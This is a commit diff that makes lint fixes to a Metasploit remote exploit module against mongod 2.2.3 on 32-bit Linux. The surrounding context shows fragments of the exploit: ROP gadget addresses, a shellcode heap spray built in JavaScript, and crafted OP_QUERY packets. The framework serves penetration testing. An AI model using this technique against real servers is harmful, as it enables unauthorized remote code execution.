Fix msftidy WARNING

unstable
agix 2013-03-28 13:36:35 +01:00
parent 69fb465293
commit 4a683ec9a4
1 changed files with 7 additions and 8 deletions

View File

@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'agix @agixid'
'agix - @agixid'
],
'References' =>
[
@ -29,12 +29,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => ['linux'],
'Targets' =>
[
[ 'Linux - mongod 2.2.3 - 32bits',
[ 'Linux - mongod 2.2.3 - 32bits',
{
'Arch' => ARCH_X86,
'mmap' => [
0x0816f768, #mmap_64@plt
0x0c0c0c0c, #NOPSLED+SHELLCODE
0x0c0c0c0c, #NOPSLED+SHELLCODE
0x0c0c0000,
0x00001000,
0x00000007,
@ -52,6 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 24 2013',
'License' => MSF_LICENSE
))
@ -95,7 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
print_status("Let's exploit, heap spray could take some time...")
my_target = target
shellcode = Rex::Text.to_unescape(payload.encoded)
@ -106,7 +106,6 @@ class Metasploit3 < Msf::Exploit::Remote
gadget1 = my_target['gadget1']
gadget2 = my_target['gadget2']
gadget3 = my_target['gadget3']
gadget4 = my_target['gadget4']
@ -130,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
payloadJS << chunk_var+'='+chunk_var+'.substring(0,('+sizechunk_var+'-'+shellcode_var+'.length));'
payloadJS << array_var+'=new Array();'
payloadJS << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array_var+'['+i_var+']='+chunk_var+'+'+shellcode_var+'; } '
#RETCHAIN+ROPCHAIN HEAPSPRAY
payloadJS << ropchain_var+'=unescape("'+Rex::Text.to_unescape(mmap)+'");'
payloadJS << chunk2_var+'="";'
@ -145,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
request_id = Rex::Text.rand_text(4)
packet = request_id #requestID
packet << "\xff\xff\xff\xff" #responseTo
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
@ -274,7 +273,7 @@ class Metasploit3 < Msf::Exploit::Remote
return 1
end
end
def get_nonce